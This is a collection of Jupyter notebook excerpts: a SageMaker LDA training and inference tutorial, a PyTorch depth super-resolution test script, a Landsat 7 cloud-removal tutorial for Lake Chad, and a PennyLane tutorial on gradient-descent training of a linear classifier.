output_path="s3://{}/{}/output".format(bucket, prefix),
train_instance_count=1,
train_instance_type="ml.c4.2xlarge",
sagemaker_session=session,
)
# set algorithm-specific hyperparameters
lda.set_hyperparameters(
num_topics=num_topics,
feature_dim=vocabulary_size,
mini_batch_size=num_documents_training,
alpha0=1.0,
)
# run the training job on input data stored in S3
lda.fit({"train": s3_train_data})
```
If you see the message
> `===== Job Complete =====`
at the bottom of the output logs then that means training sucessfully completed and the output LDA model was stored in the specified output path. You can also view information about and the status of a training job using the AWS SageMaker console. Just click on the "Jobs" tab and select training job matching the training job name, below:
```
print("Training job name: {}".format(lda.latest_training_job.job_name))
```
# Inference
***
A trained model does nothing on its own. We now want to use the model we computed to perform inference on data. For this example, that means predicting the topic mixture representing a given document.
We create an inference endpoint using the SageMaker Python SDK `deploy()` function from the job we defined above. We specify the instance type where inference is computed as well as an initial number of instances to spin up.
```
lda_inference = lda.deploy(
initial_instance_count=1,
instance_type="ml.m4.xlarge", # LDA inference may work better at scale on ml.c4 instances
)
```
Congratulations! You now have a functioning SageMaker LDA inference endpoint. You can confirm the endpoint configuration and status by navigating to the "Endpoints" tab in the AWS SageMaker console and selecting the endpoint matching the endpoint name, below:
```
print("Endpoint name: {}".format(lda_inference.endpoint_name))
```
With this realtime endpoint at our fingertips we can finally perform inference on our training and test data.
We can pass a variety of data formats to our inference endpoint. In this example we will demonstrate passing CSV-formatted data. Other available formats are JSON-formatted, JSON-sparse-formatter, and RecordIO Protobuf. We make use of the SageMaker Python SDK utilities `CSVSerializer` and `JSONDeserializer` when configuring the inference endpoint.
```
lda_inference.serializer = CSVSerializer()
lda_inference.deserializer = JSONDeserializer()
```
We pass some test documents to the inference endpoint. Note that the serializer and deserializer will atuomatically take care of the datatype conversion from Numpy NDArrays.
```
results = lda_inference.predict(documents_test[:12])
print(results)
```
It may be hard to see but the output format of SageMaker LDA inference endpoint is a Python dictionary with the following format.
```
{
'predictions': [
{'topic_mixture': [ ... ] },
{'topic_mixture': [ ... ] },
{'topic_mixture': [ ... ] },
...
]
}
```
We extract the topic mixtures, themselves, corresponding to each of the input documents.
```
computed_topic_mixtures = np.array(
[prediction["topic_mixture"] for prediction in results["predictions"]]
)
print(computed_topic_mixtures)
```
If you decide to compare these results to the known topic mixtures generated in the [Obtain Example Data](#ObtainExampleData) Section keep in mind that SageMaker LDA discovers topics in no particular order. That is, the approximate topic mixtures computed above may be permutations of the known topic mixtures corresponding to the same documents.
```
print(topic_mixtures_test[0]) # known test topic mixture
print(computed_topic_mixtures[0]) # computed topic mixture (topics permuted)
```
## Stop / Close the Endpoint
Finally, we should delete the endpoint before we close the notebook.
To do so execute the cell below. Alternately, you can navigate to the "Endpoints" tab in the SageMaker console, select the endpoint with the name stored in the variable `endpoint_name`, and select "Delete" from the "Actions" dropdown menu.
```
sagemaker.Session().delete_endpoint(lda_inference.endpoint_name)
```
# Epilogue
---
In this notebook we,
* generated some example LDA documents and their corresponding topic-mixtures,
* trained a SageMaker LDA model on a training set of documents,
* created an inference endpoint,
* used the endpoint to infer the topic mixtures of a test input.
There are several things to keep in mind when applying SageMaker LDA to real-word data such as a corpus of text documents. Note that input documents to the algorithm, both in training and inference, need to be vectors of integers representing word counts. Each index corresponds to a word in the corpus vocabulary. Therefore, one will need to "tokenize" their corpus vocabulary.
$$
\text{"cat"} \mapsto 0, \; \text{"dog"} \mapsto 1 \; \text{"bird"} \mapsto 2, \ldots
$$
Each text document then needs to be converted to a "bag-of-words" format document.
$$
w = \text{"cat bird bird bird cat"} \quad \longmapsto \quad w = [2, 0, 3, 0, \ldots, 0]
$$
Also note that many real-word applications have large vocabulary sizes. It may be necessary to represent the input documents in sparse format. Finally, the use of stemming and lemmatization in data preprocessing provides several benefits. Doing so can improve training and inference compute time since it reduces the effective vocabulary size. More importantly, though, it can improve the quality of learned topic-word probability matrices and inferred topic mixtures. For example, the words *"parliament"*, *"parliaments"*, *"parliamentary"*, *"parliament's"*, and *"parliamentarians"* are all essentially the same word, *"parliament"*, but with different conjugations. For the purposes of detecting topics, such as a *"politics"* or *governments"* topic, the inclusion of all five does not add much additional value as they all essentiall describe the same feature.
|
github_jupyter
|
```
from __future__ import print_function
import argparse
import os
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import DataLoader
from data import get_eval_set
from functools import reduce
import scipy.io as sio
import time
import imageio
import os
import numpy as np
from PIL import Image
import scipy.signal
from pmpanet_x8 import Net as PMBAX8
def downsample(ar,factor):
kernel = np.full((factor,factor),1/(factor**2))
ar = scipy.signal.convolve2d(np.asarray(ar),kernel,mode='full')
ar = ar[factor-1::factor,factor-1::factor]
return ar
current_dir = os.getcwd()
direct = os.path.abspath(os.path.join(current_dir, os.pardir))
directory = direct+'/Data_preprocessing'
# Create folder of png for the lr depth
# rgb_dir = directory+'/EPFL_nadir/rgb/'
# rgb_dir = directory+'/EPFL_oblique/rgb/'
# rgb_dir = directory+'/comballaz_nadir/rgb/'
rgb_dir = directory+'/comballaz_oblique/rgb/'
_files = os.listdir(rgb_dir)
_files.sort()
_rgb_files = [rgb_dir + f for f in _files]
_rgb_files.sort()
print(len(_rgb_files))
# dist_dir = directory+'/EPFL_nadir/dist/'
# dist_dir = directory+'/EPFL_oblique/dist/'
# dist_dir = directory+'/comballaz_nadir/dist/'
dist_dir = directory+'/comballaz_oblique/dist/'
_files = os.listdir(dist_dir)
_files.sort()
_dist_files = [dist_dir + f for f in _files]
_dist_files.sort()
print(len(_dist_files))
for num in range(len(_dist_files)):
dist_img = torch.load(_dist_files[num])
dist_img = dist_img.detach().cpu().numpy()
down_img = downsample(dist_img,8)
temp = np.zeros((136,160))
temp[:60,:90] = down_img
print(temp.shape)
im = Image.fromarray(temp)
im = im.convert('L')
# im.save(directory+'/EPFL_nadir/distpng/'+str(num)+'.png')
# im.save(directory+'/EPFL_oblique/distpng/'+str(num)+'.png')
# im.save(directory+'/comballaz_nadir/distpng/'+str(num)+'.png')
im.save(directory+'/comballaz_oblique/distpng/'+str(num)+'.png')
rgb_img = imageio.imread(_rgb_files[num])
temp2 = np.zeros((1088,1280,3))
temp2[:480,:720,:] = rgb_img
print(temp2.shape)
# imageio.imsave(directory+'/EPFL_nadir/rgbpng/'+str(num)+'.png',temp2)
# imageio.imsave(directory+'/EPFL_oblique/rgbpng/'+str(num)+'.png',temp2)
# imageio.imsave(directory+'/comballaz_nadir/rgbpng/'+str(num)+'.png',temp2)
imageio.imsave(directory+'/comballaz_oblique/rgbpng/'+str(num)+'.png',temp2)
def save_img(img, img_name):
save_img = img.squeeze().clamp(0, 1).numpy()
save_dir=os.path.join(opt.output,opt.test_dataset)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_fn = save_dir +'/'+ img_name
imageio.imwrite(save_fn,save_img*255)
# # Testing settings EPFL nadir
# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
# parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
# parser.add_argument('--gpu_mode', type=bool, default=False)
# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
# parser.add_argument('--input_dir', type=str, default=directory)
# parser.add_argument('--output', default='/EPFL_nadir/Results/', help='Location to save checkpoint models')
# parser.add_argument('--test_dataset', type=str, default='/EPFL_nadir/distpng/')
# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_nadir/rgbpng/')
# parser.add_argument('--model_type', type=str, default='PMBAX8')
# parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
# opt = parser.parse_args("")
# gpus_list=range(opt.gpus)
# print(opt)
# # Testing settings EPFL oblique
# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
# parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
# parser.add_argument('--gpu_mode', type=bool, default=False)
# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
# parser.add_argument('--input_dir', type=str, default=directory)
# parser.add_argument('--output', default='/EPFL_oblique/Results/', help='Location to save checkpoint models')
# parser.add_argument('--test_dataset', type=str, default='/EPFL_oblique/distpng/')
# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_oblique/rgbpng/')
# parser.add_argument('--model_type', type=str, default='PMBAX8')
# parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
# opt = parser.parse_args("")
# gpus_list=range(opt.gpus)
# print(opt)
# # Testing settings comballz nadir
# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
# parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
# parser.add_argument('--gpu_mode', type=bool, default=False)
# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
# parser.add_argument('--input_dir', type=str, default=directory)
# parser.add_argument('--output', default='/comballaz_nadir/Results/', help='Location to save checkpoint models')
# parser.add_argument('--test_dataset', type=str, default='/comballaz_nadir/distpng/')
# parser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_nadir/rgbpng/')
# parser.add_argument('--model_type', type=str, default='PMBAX8')
# parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
# opt = parser.parse_args("")
# gpus_list=range(opt.gpus)
# print(opt)
# Testing settings comballz oblique
parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
parser.add_argument('--upscale_factor', type=int, default=8, help="super resolution upscale factor")
parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')
parser.add_argument('--gpu_mode', type=bool, default=False)
parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')
parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')
parser.add_argument('--gpus', default=1, type=float, help='number of gpu')
parser.add_argument('--input_dir', type=str, default=directory)
parser.add_argument('--output', default='/comballaz_oblique/Results/', help='Location to save checkpoint models')
parser.add_argument('--test_dataset', type=str, default='/comballaz_oblique/distpng/')
parser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_oblique/rgbpng/')
parser.add_argument('--model_type', type=str, default='PMBAX8')
parser.add_argument('--model', default="./pre_train_model/PMBA_color_x8.pth", help='pretrained x8 model')
opt = parser.parse_args("")
gpus_list=range(opt.gpus)
print(opt)
cuda = opt.gpu_mode
if cuda and not torch.cuda.is_available():
raise Exception("No GPU found, please run without --cuda")
torch.manual_seed(opt.seed)
if cuda:
torch.cuda.manual_seed(opt.seed)
print('===> Loading datasets')
test_set = get_eval_set(os.path.join(opt.input_dir,opt.test_dataset),os.path.join(opt.input_dir,opt.test_rgb_dataset))
testing_data_loader = DataLoader(dataset=test_set, batch_size=opt.testBatchSize, shuffle=False)
print('===> Building model')
if opt.model_type == 'PMBAX8':
model = PMBAX8(num_channels=1, base_filter=64, feat = 256, num_stages=3, scale_factor=opt.upscale_factor) ##For NTIRE2018
else:
model = PMBAX8(base_filter=64, feat = 256, num_stages=5, scale_factor=opt.upscale_factor) ###D-DBPN
####
if cuda:
model = torch.nn.DataParallel(model, device_ids=gpus_list)
if os.path.exists(opt.model):
model.load_state_dict(torch.load(opt.model, map_location=lambda storage, loc: storage))
print('Pre-trained x8 model is loaded.<---------------------------->')
if cuda:
model = model.cuda(gpus_list[0])
model.eval()
torch.set_grad_enabled(False)
for batch in testing_data_loader:
input_i,input_rgb, name = Variable(batch[0],volatile=True),Variable(batch[1],volatile=True), batch[2]
if cuda:
input_i = input_i.cuda(gpus_list[0])
input_rgb = input_rgb.cuda(gpus_list[0])
t0 = time.time()
prediction = model(input_rgb,input_i)
t1 = time.time()
print("===> Processing: %s || Timer: %.4f sec." % (name[0], (t1 - t0)))
save_img(prediction.cpu().data, name[0])
```
|
github_jupyter
|
```
# Enable importing of utilities
import sys
sys.path.append('..')
%matplotlib inline
```
# Cleaning up imagery for pre and post rainy season
The [previous tutorial](igarrs_chad_01.ipynb) addressed the identifying the extent of the rainy season near Lake Chad. This tutorial will focus on cleaning up optical imagery to make it suitable for water-detection algorithms.
<br>
# What to expect from this notebook
- Introduction to landsat 7 data.
- basic xarray manipulations
- removing clouds and scanline error using `pixel_qa`
- building a composite image
- saving products
<br>
# Algorithmic process
<br>

<br>
The algorithmic process is fairly simple. It is a composable chain of operations on landsat 7 imagery. The goal is to create a **scanline free** and **cloud-free** representation of the data for **pre** and **post** rainy season segments of 2015. The process is outlined as follows:
1. load landsat imagery data for 2015
2. isolate pre and post rainy season data
3. remove clouds and scan-line errors from pre and post rainy sesaon data.
4. build a cloud free composite for pre and post rainy sesaon data.
5. export the data for future use
What scanline-free or cloud-free means will be addressed later in the tutorial. To understand everything, just follow the steps in sequence.
# Creating a Datacube Object
<br>
The following code connects to the datacube and accepts `cloud_removal_in_chad` as an app-name. The app name is typically only used in logging and debugging.
<br>
```
import datacube
dc = datacube.Datacube(app = "cloud_removal_in_chad")
```
<br>
Like in the previous tutorial. The datacube object will be used to load data that has previously been ingested by the datacube.
<br>
## Defining the boundaries of the area and restricting measurements
```
## Define Geographic boundaries using a (min,max) tuple.
latitude = (12.75, 13.0)
longitude = (14.25, 14.5)
## Specify a date range using a (min,max) tuple
from datetime import datetime
time = (datetime(2015,1,1), datetime(2016,1,1))
## define the name you gave your data while it was being "ingested", as well as the platform it was captured on.
platform = 'LANDSAT_7'
product = 'ls7_ledaps_lake_chad_full'
measurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']
```
As a reminder and in-notebook reference, the following line of code displays the extents of the study area. Re-orient yourself with it.
```
from utils.data_cube_utilities.dc_display_map import display_map
display_map(latitude = (12.75, 13.0),longitude = (14.25, 14.5))
```
<br>
## Loading in Landsat 7 imagery
The following code loads in landsat 7 imagery using the constraints defined above
```
#Load Landsat 7 data using parameters,
landsat_data = dc.load(latitude = latitude,
longitude = longitude,
time = time,
product = product,
platform = platform,
measurements = measurements)
```
<a id='#intro_ls7'></a>
# Explore the Landsat 7 dataset
The previous tutorial barely grazed the concept of xarray variables.
To understand how we use landsat7 imagery it will be necessary to make a brief detour and explain it in greater detail.
<br>
### xarray - Variables & Data-arrays
When you output the contents of your loaded -dataset...
```
print(landsat_data)
```
<br>
.. you should notice a list of values called data-variables.
<br>
These 'variables' are really 3 dimensional [data-arrays](http://xarray.pydata.org/en/stable/data-structures.html) housing values like 'red', 'green', 'blue', and 'nir', values for each lat,lon,time coordinate pair in your dataset. Think of an [xarray.Dataset](http://xarray.pydata.org/en/stable/data-structures.html#dataset) as an object that houses many different types of data under a shared coordinate system.
<br>

<br>
If you wish to fetch certain data from your dataset you can call it by its variable name. So, if for example, you wanted to get the near-infrared data-array from the dataset, you would just index it like so:
<br>
```
landsat_data.nir
```
<br>
The object printed above is a [data-array](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.html). Unlike a data-set, data-arrays only house one type of data and has its own set of attributes and functions.
<br>
### xarray - Landsat 7 Values
Let's explore landsat datasets in greater detail by starting with some background about what sort of data landsat satellites collect...
In layman terms, Landsat satellites observe light that is reflected or emitted from the surface of the earth.
<br>

<br>
In landsat The spectrum for observable light is split up into smaller sections like 'red', 'green', 'blue', 'thermal','infrared' so-on and so forth...
Each of these sections will have some value denoting how much of that light was reflected from each pixel. The dataset we've loaded in contains values for each of these sections in separate data-arrays under a shared dataset.
The ones used in this series of notebooks are:
- `red`
- `green`
- `blue`
- `nir` - near infrared
- `swir1` - band for short wave infrared
- `swir2` - band for short wave infrared
There is an alternative band attached to the Landsat7 xarray dataset called pixel qa.
- `pixel_qa` - land cover classifications
### Taking a look at landsat data taken on July 31st, 2015
The data listed above can be used in conjunction to display a visual readout of the area. The code below will use our `red` `green`, and `blue` values to produce a **png** of one of our time slices.
```
## The only take-away from this code should be that a .png is produced.
## Any details about how this function is used is out of scope for this tutorial
from utils.data_cube_utilities.dc_utilities import write_png_from_xr
write_png_from_xr('../demo/landsat_rgb.png', landsat_data.isel(time = 11), ["red", "green", "blue"], scale = [(0,2000),(0,2000),(0,2000)])
```

# The need to clean up imagery
Considering the imagery above. It is hard to build a comprehensive profile on landcover. There are several objects that occlude the surface of the earth. Namely errors introduced by an SLC malfunction, as well as cloud cover.
### Scanline Gaps
In May of 2003, Landsat7's scan line correction system failed (SLC). This essentially renders several horizontal rows of imagery unusable for analysis. Luckily, these scanline gaps don't always appear in the same spots. With enough imagery, a "gap-less" representation can be constructed that we can use to analyze pre and post rainy season.
<br>

<br>
### Cloud occlusion
Clouds get in the way of analyzing/observing the surface reflectance values of Lake Chad. Fortunately, like SLC gaps, clouds don't always appear in the same spot. With enough imagery, taken at close enough intervals, a "cloudless" representation of the area can be built for pre and post rainy season acquisitions of the region.
<br>

<br>
>**Strong Assumptions**
>In this analysis, strong assumptions are made regarding the variability of lake size in the span of a few acquisitions.(Namely, that the size in a pre-rainy season won't vary as much as it will after the rainy season contributes to the surface area of the lake)
# Cleaning up Pre and Post rainy season Imagery
### Splitting the dataset in two
The first step to cleaning up pre and post rainy season imagery is to split our year's worth of acquisitions into two separate datasets. In the previous notebooks, We've discovered that an appropriate boundary for the rainy season is sometime between June and October. For the sake of this notebook, we'll choose the first day in both months.
<br>
```
start_of_rainy_season = '2015-06-01'
end_of_rainy_season = '2015-10-01'
```
<br>
The next step after defining this would be to define the time ranges for both post and pre, then use them to select subsections from the original dataset to act as two separate datasets. (Like in the diagram below)
<br>

<br>
```
start_of_year = '2015-01-01'
end_of_year = '2015-12-31'
pre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))
post = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))
```
<br>
# Building a cloud-free and gap-free representation
This section of the process works s by masking out clouds and gaps from the imagery and then selecting a median valued cloud/scanline-gap free pixels of an image.

<br>
- Masking is done using the **pixel_qa** variable.
- The gap/cloud-free compositing is done using a technique called **median-pixel-mosaicing**
<br>
### Masking out clouds and SLC gaps using `pixel_qa`
We're going to be using one of our loaded values called `pixel_qa` for the masking step.
`pixel_qa` doesn't convey surface reflectance intensities. Instead, it is a band that contains more abstract information for each pixel. It places a pixel under one or more of the following categories:
- `clear` - pixel is likely normal landcover
- `water` - pixel is likely water
- `cloud_shadow` - pixel is likely in the shadow of a cloud
- `snow` - the pixel is likely snowy
- `cloud` - the pixel is likely cloudy
- `fill` - the pixel is classified as not fit for analysis (SRC-Gaps fall in this classification)
We will use these classifications to mask out values unsuitable for analysis.
### A Masking Function
The masking step will have to make use of a very peculiar encoding for each category.
<br>
\begin{array}{|c|c|}
\hline bit & value & sum & interpretation \\\hline
0 & 1 & 1 & Fill \\\hline
1 & 2 & 3 & Clear \\\hline
2 & 4 & 7 & Water \\\hline
3 & 8 & 15 & Cloud Shadow \\\hline
4 & 16 & 31 & Snow \\\hline
5 & 32 & 63 & Cloud \\\hline
6 & 64 & 127 & Cloud Confidence \\
&&& 00 = None \\
7& 128& 255 & 01 = Low \\
&&& 10 = Med \\
&&& 11 = High \\\hline
\end{array}
<br>
The following function was constructed to mask out anything that isn't **clear** or **water**.
<br>
```
import numpy as np
def cloud_and_slc_removal_mask(dataset):
#Create boolean Masks for clear and water pixels
clear_pixels = dataset.pixel_qa.values == 2 + 64
water_pixels = dataset.pixel_qa.values == 4 + 64
a_clean_mask = np.logical_or(clear_pixels, water_pixels)
return a_clean_mask
```
<br>
The following code creates a **boolean** mask, for slc code.
<br>
```
mask_for_pre = cloud_and_slc_removal_mask(pre)
mask_for_post = cloud_and_slc_removal_mask(post)
```
<br>
A boolean mask is essentially what it sounds like. Let's look at its print-out
<br>
```
print(mask_for_post)
```
<br>
This boolean mask contains a **true** value for pixels that are clear and un-occluded by clouds or scanline gaps and **false** values where the opposite is true.
<br>
### Example of mask use
There are many ways to apply a mask. The following example is the xarray way. It will apply *nan* values to areas with clouds or scanline issues:
<br>
```
pre.where(mask_for_pre)
```
Notice that a lot of the values in the array above have nan values. Compositing algorithms like the **median-pixel mosaic** below, make use of this **where** function as well as 'nans' as the marker for no-data values.
<br>
### Median Pixel Mosaic
A median pixel mosaic is used for our cloud/slc-gap free representation of satellite imagery. It Works by masking out clouds/slc-gaps from imagery, and using the median valued cloud-free pixels in the time series of each lat-lon coordinate pair
<br>

Here is a function we can use to build our mosaic. Its exact mechanics are abstracted away from this tutorial and can be explored in further detail by visiting [our github](https://github.com/ceos-seo/data_cube_utilities/blob/master/dc_mosaic.py).
<br>
```
from utils.data_cube_utilities.dc_mosaic import create_median_mosaic
def mosaic(dataset, mask):
return create_median_mosaic(dataset, clean_mask = mask)
```
<br>
Lets use it to generate our cloud free representations of the area:
<br>
```
clean_pre = mosaic(pre, mask_for_pre)
clean_post = mosaic(post, mask_for_post)
```
<br>
# Taking a peek at our cloud-free composites
<br>
### Pre Rainy Season
```
print(clean_pre)
write_png_from_xr('../demo/pre_rain_mosaic.png', clean_pre, ["red", "green", "blue"], scale = [(0,2000),(0,2000),(0,2000)])
```
Your png should look something like this:

### Post Rainy Season
```
print(clean_post)
write_png_from_xr('../demo/post_rain_mosaic.png', clean_post, ["red", "green", "blue"], scale = [(0,2000),(0,2000),(0,2000)])
```

# Next Steps
The [next notebook](igarss_chad_03.ipynb) in the series deals with water classification on these cloud free composites! We'll need to save our work so that it can be loaded in the next notebook. The good news is that xarrays closely resemble the structure of net NETCDF files. It would make sense to save it off in that format. The code below saves these files as NETCDFS using built-in export features of xarray.
```
## Lets drop pixel qa since it doesn't make sense to house it in a composite.
final_post = clean_post.drop('pixel_qa')
final_pre = clean_pre.drop('pixel_qa')
final_post.to_netcdf('../demo/post_rain.nc')
final_pre.to_netcdf('../demo/pre_rain.nc')
```
The entire notebook has been condensed down to a about 2 dozen lines of code below.
```
import datacube
from datetime import datetime
from utils.data_cube_utilities.dc_mosaic import create_median_mosaic
def mosaic(dataset, mask):
return create_median_mosaic(dataset, clean_mask = mask)
def cloud_and_slc_removal_mask(dataset):
clear_pixels = dataset.pixel_qa.values == 2 + 64
water_pixels = dataset.pixel_qa.values == 4 + 64
a_clean_mask = np.logical_or(clear_pixels, water_pixels)
return a_clean_mask
#datacube obj
dc = datacube.Datacube(app = "cloud_removal_in_chad", config = '/home/localuser/.datacube.conf')
#load params
latitude = (12.75, 13.0)
longitude = (14.25, 14.5)
time = (datetime(2015,1,1), datetime(2016,1,1))
platform = 'LANDSAT_7'
product = 'ls7_ledaps_lake_chad_full'
measurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']
#load
landsat_data = dc.load(latitude = latitude, longitude = longitude, time = time, product = product, platform = platform, measurements = measurements)
#time split params
start_of_rainy_season = '2015-06-01'
end_of_rainy_season = '2015-10-01'
start_of_year = '2015-01-01'
end_of_year = '2015-12-31'
#time split
pre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))
post = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))
#mask for mosaic processs
mask_for_pre = cloud_and_slc_removal_mask(pre)
mask_for_post = cloud_and_slc_removal_mask(post)
#mosaic process
clean_pre = mosaic(pre, mask_for_pre)
clean_post = mosaic(post, mask_for_post)
#save file
clean_pre.drop('pixel_qa').to_netcdf('../demo/pre_01.cd')
clean_post.drop('pixel_qa').to_netcdf('../demo/post_01.cd')
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/SaashaJoshi/pennylane-demo-cern/blob/main/1_classical_ml_with_automatic_differentiation.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
%%capture
# Comment this out if you don't want to install pennylane from this notebook
!pip install pennylane
# Comment this out if you don't want to install matplotlib from this notebook
!pip install matplotlib
```
# Training a machine learning model with automatic differentiation
In this tutorial we will:
* implement a toy version of a typical machine learning setup,
* understand how automatic differentiation allows us to compute gradients of the machine learning model, and
* use automatic differentiation to train the model.
First some imports...
```
import pennylane as qml
from pennylane import numpy as np # This will import a special, "differentiable" version of numpy.
import matplotlib.pyplot as plt
%matplotlib inline
np.random.seed(42)
np.array([0.1, -0.9]) # This is a tensor array with gradient
import numpy as vanilla_np
vanilla_np.array([0.1, -0.9])
x_axis = np.linspace(0, 6)
function_sin = np.sin(x_axis)
plt.plot(x_axis, function_sin)
# We can find the gradient of the above function too.
# In a vanilla numpy version, we cannot differentiate!
gradient_fnc = qml.grad(np.sin, argnum = 0)
g = [gradient_fnc(x) for x in x_axis]
plt.plot(x_axis, function_sin)
plt.plot(x_axis, g)
```
## 1. The three basic ingredients
A machine learning problem usually consists of *data*, a *model (family)* and a *cost function*:
<br />
<img src="https://github.com/XanaduAI/pennylane-demo-cern/blob/main/figures/data-model-cost.png?raw=1" width="500">
<br />
*Training* selects the best model from the family by minimising the cost on a training set of data samples. If we design the optimisation problem well, the trained model will also have a low cost on new sets of data samples that have not been used in training. This means that the model *generalises* well.
We will now create examples for each ingredient.
### Data
Let us create a two-dimensional toy dataset.
```
n_samples = 100
X0 = np.array([[np.random.normal(loc=-1, scale=1),
np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)])
X1 = np.array([[np.random.normal(loc=1, scale=1),
np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)])
X = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.
Y = np.concatenate([-np.ones(50), np.ones(50)], axis=0)
data = list(zip(X, Y))
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.show()
X.shape
```
### Model family
Next, we construct a linear model.
```
def model(x, w):
return np.dot(x, w)
```
Let's try it out.
```
w = np.array([-0.5, -0.2])
model(X0[0], w)
# model(X0[1], w)
# If we put a threshold at zero (0), X0[0] would be classified in class +1 and X0[1] will be classified in class -1
```
We can plot the decision boundary, or the boundary in data space where the model flips from a negative to a positive prediction
```
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')
plt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')
plt.show()
```
### Cost function
How good is the model on a single input-output training pair?
```
def loss(a, b):
return (a - b)**2 # Square of difference.
```
What is the average loss on a data set of multiple pairs?
```
def average_loss(w, data):
c = 0
for x, y in data:
prediction = model(x, w)
c += loss(prediction, y)
return c/len(data)
w = np.array([1.3, -0.4])
average_loss(w, data)
```
## 2. Automatic computation of gradients
Because we imported PennyLane's numpy version, we can now compute gradients of the average loss with respect to the weights!
```
gradient_fn = qml.grad(average_loss, argnum=0)
gradient_fn(w, data)
```
We can use gradients to guess better candidates for parameters.
```
w_new = w - 0.05*gradient_fn(w, data)
average_loss(w_new, data)
```
This works because the gradient always points towards the steepest ascent in the cost landscape.
```
# compute the gradient at some point in parameter space
some_w = np.array([-0.6, 0.5])
g = 0.01*gradient_fn(some_w, data)
# learning rate = 0.01 here above!
# make a contourplot of the cost
w1s = np.linspace(-2, 2)
w2s = np.linspace(-2, 2)
cost_grid = []
for w1 in w1s:
for w2 in w2s:
w = np.array([w1, w2])
cost_grid.append(average_loss(w, data))
cost_grid = np.array(cost_grid).reshape((50, 50))
plt.contourf(w1s, w2s, cost_grid.T)
plt.arrow(some_w[0], some_w[1], some_w[0] + g[0], some_w[1] + g[1],
head_width=0.3, head_length=0.3, fc='r', ec='r')
plt.xlabel(r"$w_1$")
plt.ylabel(r"$w_2$")
plt.show()
```
## 3. Training with gradient descent
Putting it all together, we can train the linear model.
```
w_init = np.random.random(size=(2,))
w = np.array(w_init)
history = []
for i in range(15):
w_new = w - 0.05*gradient_fn(w, data)
print(average_loss(w_new, data))
history.append(w_new)
w = w_new
```
We can easily visualise the path that gradient descent took in parameter space.
```
plt.contourf(w1s, w2s, cost_grid.T)
history = np.array(history)
plt.plot(history[:, 0], history[:, 1], "-o")
plt.xlabel(r"$w_1$")
plt.ylabel(r"$w_2$")
plt.show()
```
Training didn't fully converge yet, but the decision boundary is already better.
```
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')
plt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')
plt.show()
```
# TASKS
1. Add a constant scalar bias term $b \in \mathbb{R}$ to the model,
$$ f(x, w) = \langle w, x \rangle + b, $$
and train both $w$ and $b$ at the same time.
2. Change the model to a neural network with a single hidden layer.
$$ f(x, w, W) = \langle w, \varphi(Wx) \rangle,$$
where $W$ is a weight matrix of suitable dimension and $\varphi$ a hand-coded nonlinar activation function.
Tipp: You can use the vector-valued sigmoid function
```
def sigmoid(z):
return 1/(1 + np.exp(-x))
```
3. Code up the above example using PyTorch.
```
n_samples = 100
X0 = np.array([[np.random.normal(loc=-1, scale=1),
np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)])
X1 = np.array([[np.random.normal(loc=1, scale=1),
np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)])
X = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.
Y = np.concatenate([-np.ones(50), np.ones(50)], axis=0)
data = list(zip(X, Y))
plt.scatter(X0[:,0], X0[:,1])
plt.scatter(X1[:,0], X1[:,1])
plt.show()
samples = 100
# Class 1
